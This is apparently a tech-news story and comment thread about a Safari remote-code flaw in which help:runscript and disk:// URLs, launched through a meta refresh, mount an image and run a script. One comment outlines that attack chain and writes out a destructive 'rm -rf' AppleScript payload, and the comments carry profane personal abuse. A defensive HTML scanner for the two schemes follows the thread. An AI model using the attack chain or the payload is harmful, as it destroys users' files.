Safari Falls Victim to Remote Code Exploit
A user writes, "A new vulnerability has been found in Mac OS X's Safari, which will launch Help.app and run an arbitrary script with a URL like 'help:runscript=...', assuming a known path (which is possible when Safari is set to automount disk images (which is the default)). A nice working demonstration is available on insecure.ws while the incident has been reported on Full-Disclosure."
Jesus, pudge, you reject my story where it is mentioned that YOU DON'T NEED AUTO OPENING OF "SAFE FILES" TURNED ON FOR THIS TO WORK and then post some lame arse submission that gets it wrong.
.help extension to the chess app) and a link where to get software to do this (because you can't do it from the GUI in OSX as you could in OS9).
Fact 1. Using the disk:// URL type, and sticking it in a Meta refresh tag, you can remotely mount a disk image without the user even knowing. It DOES NOT need auto open of safe files to be turned on.
Fact 2. If the disk image is small, which it would be if there's only an AppleScript on it with 'do shellscript="rm -rf~/*" ', then getting the user to click on a link that runs the script a few seconds later is easy and you could even do it via javascript and automate the whole thing.
Fact 3. Pudge, your sarcastic "from the let's publish it so everyone knows who to do it" is blatant stupidity. Jesus fuck. This vulnerability was on Heise.de on Saturday. It may be news to you, pudge, but one hell of a lot of people read and visit heise's site. Not everyone is an English only American.
Fact 4. And this makes me especially mad at you, you clown, for using this submission instead of mine, is that I submitted a workaround (point the
Grow up pudge and use your brains instead of your zealotry.
This hint was taken directly from the article...
Blatant karma whore!
1. YOUR submission was incorrect! This vulnerability works in ALL browsers!
2. The workaround IS a goddamn workaround and IT DOES work, and IT DOESN'T disable help! Jesus almighty, try it out, it merely disables running help from the browser, not running help from an application.
3. Apple was warned TWO MONTHS ago about this vulnerability! It was openly published on Heise on Saturday. It was all over Mac forums in Germany and the US over the weekend.
4. Since it was openly known (and with no response from Apple for two months), you nice bright guy, I decided to submit a COMPLETE story with a working workaround (it really does work pudge) in order to help Mac users protect themselves, not because of wanting to be in anyone's highlights.
I am going to mail Taco about this pudge. You are guilty, IMO, of neglecting a very serious security vulnerability on OSX, and then neglecting to actually check the facts and then finally posting a story that only helps the knowledge of the exploit spread but with no help to users, and that solely because YOU do not agree with a FACT (it was already known). Disgusting.
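An added example, not part of the story or of any comment above: a small filter a web proxy or mail gateway could run over HTML to flag the two URL schemes this thread names, `help:runscript` and `disk:`, including the meta-refresh case that needs no click. The regexes, function names and the sample page are assumptions constructed for this sketch.

```python
import re
from html.parser import HTMLParser

# Schemes named in the thread; the patterns themselves are this example's assumption.
RISKY = re.compile(r"^\s*(help:\s*runscript|disk:)", re.I)
# Pulls the target out of <meta http-equiv="refresh" content="0; url=...">
REFRESH_URL = re.compile(r"url\s*=\s*['\"]?\s*([^'\";]+)", re.I)

class SchemeScanner(HTMLParser):
    """Collects (location, url) pairs for risky schemes found in a page."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        # A meta refresh navigates without any user action.
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = REFRESH_URL.search(a.get("content", ""))
            if m:
                self._check(m.group(1), "meta refresh (no click needed)")
        # Links, frames, images and scripts carry the URL in href or src.
        for name in ("href", "src"):
            if name in a:
                self._check(a[name], f"<{tag} {name}>")

    def _check(self, url, where):
        if RISKY.match(url):
            self.findings.append((where, url.strip()))

def scan(html):
    scanner = SchemeScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample page; hosts and the script argument are placeholders.
SAMPLE = """<html><head>
<meta http-equiv="refresh" content="0; url=disk://example.invalid/image.dmg">
</head><body>
<a href="help:runscript=PLACEHOLDER">docs</a>
<a href="https://example.invalid/help">ordinary link</a>
</body></html>"""

if __name__ == "__main__":
    for where, url in scan(SAMPLE):
        print(f"flag: {where}: {url}")
```

This only inspects static markup; a page that builds the URL in script at run time would not be caught by it.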